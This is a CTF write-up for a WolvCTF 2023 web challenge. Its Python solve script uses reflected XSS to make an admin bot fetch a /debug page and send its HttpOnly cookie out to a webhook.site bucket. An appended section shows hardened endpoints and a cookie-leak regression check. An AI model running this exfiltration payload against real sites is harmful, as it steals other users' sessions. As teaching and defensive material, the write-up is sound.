WolvCTF-2023 WEB Solved
Challenge author: unknown
First blood: heyile
First blood reward: 0 coins
Solves: 23
Hint:
Description: wctf{}
Admin's writeup:
import requests
import os
import json
import urllib.parse

# setup bucket: reuse a cached webhook.site bucket if one exists, otherwise create one
token_path = ".webhook-site.token"
if os.path.exists(token_path):
    with open(token_path, "r") as f:
        bucket_id = f.read()
else:
    r = requests.post("https://webhook.site/token")
    bucket_id = r.json()["uuid"]
    with open(token_path, "w") as f:
        f.write(bucket_id)
bucket_url = f"https://webhook.site/{bucket_id}"
print(f"https://webhook.site/#!/{bucket_id}/")

# execute exploit
base_base = 'http://82.157.146.43:12762'
visit_base = f'{base_base}/visit?url='
show_base = f'{base_base}/zombie?show='
# Script the admin bot runs: fetch /debug (same origin, so its cookie is sent along),
# then relay the JSON response to the webhook bucket as a query parameter.
# Double braces are needed because the payload is an f-string.
payload = f"""
<script>
(async function() {{
    await fetch("{bucket_url}?cookie=" + JSON.stringify(await (await fetch("{base_base}/debug")).json()))
}})();
</script>
"""
# Double-encode: the /visit URL wraps the /zombie URL, which in turn wraps the payload
target_url = visit_base + urllib.parse.quote_plus(show_base + urllib.parse.quote_plus(payload))
print("sending", target_url)
r = requests.get(target_url)
print(r.text)

# fetch result: the newest request in the bucket carries the relayed /debug JSON
r = requests.get(f"https://webhook.site/token/{bucket_id}/requests?sorting=newest")
print(json.loads(r.json()["data"][0]["query"]["cookie"])["cookie"])
HttpOnly prevents JavaScript from reading the cookie, so a bypass is needed. Because the response of the debug page contains the cookie, the idea is to make the admin bot visit the debug page and send the page's response back out. Pay attention to the JavaScript encoding and to encoding the content of the page response.
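As an added illustration (not part of the original writeup or the challenge's own code), the following stdlib-only Python shows the two server-side patterns the bypass depends on beside their hardened forms: a /debug endpoint that serialises the request cookie into its response, which makes HttpOnly irrelevant to any same-origin script, and a /zombie?show= parameter reflected into HTML unescaped. The endpoint names come from the page; the cookie names and values, the header dictionary and the helper names are constructed for this example. The last function is a regression check a defender can run over every endpoint that serialises request data.

```python
"""Why HttpOnly is not enough when the server reflects cookies, and the fixes.
Stdlib only, no network; request headers are constructed below."""
import html
import json
from http.cookies import SimpleCookie

# Constructed sample headers, as the admin bot's browser would send them.
SAMPLE_HEADERS = {
    "Cookie": "session=s3cr3t-session-token; theme=dark",
    "User-Agent": "HeadlessChrome",
}


def parse_cookies(headers):
    """Return {name: value} for the request's Cookie header."""
    jar = SimpleCookie()
    jar.load(headers.get("Cookie", ""))
    return {name: morsel.value for name, morsel in jar.items()}


def debug_view_leaky(headers):
    """Weak pattern: the diagnostics endpoint echoes the raw Cookie header.
    HttpOnly only blocks document.cookie; a same-origin fetch() still sends
    the cookie and the script can read it back out of this JSON."""
    return json.dumps({
        "cookie": headers.get("Cookie", ""),
        "user_agent": headers.get("User-Agent", ""),
    })


def debug_view_hardened(headers):
    """Hardened: never serialise credentials. If cookie information is useful
    for debugging, expose the names only, never the values."""
    return json.dumps({
        "cookie_names": sorted(parse_cookies(headers)),
        "user_agent": headers.get("User-Agent", ""),
    })


def show_view_leaky(show):
    """Weak pattern: the query parameter lands in the HTML body unescaped,
    so a visitor-controlled URL can carry a script for the admin bot to run."""
    return f"<html><body>{show}</body></html>"


def show_view_hardened(show):
    """Hardened: contextual output encoding for an HTML text node."""
    return f"<html><body>{html.escape(show, quote=True)}</body></html>"


def response_leaks_cookie(headers, body):
    """Regression check: names of request cookies whose value appears verbatim
    in the response body. Expect an empty list from every endpoint."""
    return [name for name, value in parse_cookies(headers).items()
            if value and value in body]


if __name__ == "__main__":
    # Constructed parameter, the same shape of input the /zombie page reflects.
    marker = "<script>alert(1)</script>"
    print("leaky /debug leaks:", response_leaks_cookie(SAMPLE_HEADERS, debug_view_leaky(SAMPLE_HEADERS)))
    print("hardened /debug leaks:", response_leaks_cookie(SAMPLE_HEADERS, debug_view_hardened(SAMPLE_HEADERS)))
    print("leaky show:", show_view_leaky(marker))
    print("hardened show:", show_view_hardened(marker))
```

The check in `response_leaks_cookie` is the useful part for a defender: run it in the test suite against every handler that dumps request state (debug pages, error pages, "whoami" endpoints), because any one of them turns an HttpOnly cookie into a same-origin readable value.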